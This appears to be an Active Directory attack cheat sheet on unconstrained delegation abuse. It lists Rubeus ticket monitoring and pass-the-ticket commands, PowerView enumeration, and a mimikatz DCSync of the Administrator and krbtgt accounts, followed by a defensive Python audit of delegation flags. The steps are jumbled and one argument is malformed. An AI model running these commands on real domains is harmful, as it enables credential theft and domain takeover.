General/Basic or Unconstrained Delegation allows the first-hop server (the web server in our example) to request access to any service on any computer in the domain.
Required
Define Unconstrained Delegation Machines
We need a user who has access to the machine.
Essentially this looks like so: User --- authenticates to ---> IIS server ---> authenticates on behalf of the user ---> DB server
Hint: discover users on whom you have WriteDACL permission, or do enumeration to find a user.
Rubeus
.\Rubeus.exe monitor /monitorinterval:10 /targetuser$ /nowrap
.\Rubeus.exe ptt /ticket:base64
.\rubeus.exe asktgt /user:abdo /domain:hacktor.local /ntlm:Hash /outfile:FileName.tgt
#OR
cat b64.txt|base64 -d > ticket.kirbi
After obtaining the TGT tickets from the domain controller, we can now request service tickets for the allowed services, i.e., CIFS and TIME, or alternate services like LDAP or WMI.
mimikatz.exe "privilege::debug" "kerberos::ptt PDC.kirbi" "lsadump::dcsync /domain:hacktor.local /user:Administrator" "exit"
# Once the ticket is injected, run DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
Now enumerate the computers which have unconstrained delegation enabled.
. .\powerview.ps1
Get-NetComputer -Unconstrained
Example output: We find the computer WIN-Q4788GPE9L7 with unconstrained delegation enabled.
Step 2: Find Local Admin Access
Find-LocalAdminAccess
Output: Our user has local admin access to the computer with unconstrained delegation.
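A defender-side check for the delegation setting enumerated above, as an added example that is not part of the original page: it decodes `userAccountControl` values from an account export to list enabled, non-DC accounts trusted for unconstrained delegation, plus privileged accounts not marked "sensitive and cannot be delegated". The sample records, their UAC values, and the `privileged` field are constructed assumptions.

```python
# Added example (not from the original page): audit userAccountControl
# values for unconstrained delegation exposure.
# Bit values are the documented userAccountControl flags.
ACCOUNTDISABLE = 0x2
SERVER_TRUST_ACCOUNT = 0x2000       # domain controller (delegation expected)
TRUSTED_FOR_DELEGATION = 0x80000    # unconstrained delegation
NOT_DELEGATED = 0x100000            # "Account is sensitive and cannot be delegated"

# Constructed sample export; UAC values and the "privileged" column are
# assumptions for illustration (e.g. derived from group membership).
SAMPLE = [
    {"name": "PDC$",             "uac": 0x82000,  "privileged": False},
    {"name": "WIN-Q4788GPE9L7$", "uac": 0x81000,  "privileged": False},
    {"name": "OLD-IIS$",         "uac": 0x81002,  "privileged": False},
    {"name": "WKSTN01$",         "uac": 0x1000,   "privileged": False},
    {"name": "svc-web",          "uac": 0x80200,  "privileged": False},
    {"name": "Administrator",    "uac": 0x200,    "privileged": True},
    {"name": "da-backup",        "uac": 0x100200, "privileged": True},
]


def has(uac, flag):
    return (uac & flag) == flag


def unconstrained_accounts(records):
    """Enabled, non-DC accounts trusted for unconstrained delegation."""
    return [
        r["name"] for r in records
        if has(r["uac"], TRUSTED_FOR_DELEGATION)
        and not has(r["uac"], SERVER_TRUST_ACCOUNT)
        and not has(r["uac"], ACCOUNTDISABLE)
    ]


def delegatable_privileged(records):
    """Privileged accounts whose TGT may be forwarded to a delegation host."""
    return [r["name"] for r in records
            if r["privileged"] and not has(r["uac"], NOT_DELEGATED)]


def report(records):
    hosts = unconstrained_accounts(records)
    exposed = delegatable_privileged(records) if hosts else []
    return {"review_delegation": hosts, "mark_sensitive": exposed}


if __name__ == "__main__":
    print(report(SAMPLE))
```

Accounts under `review_delegation` are candidates for moving to constrained delegation; accounts under `mark_sensitive` are candidates for the "sensitive and cannot be delegated" setting.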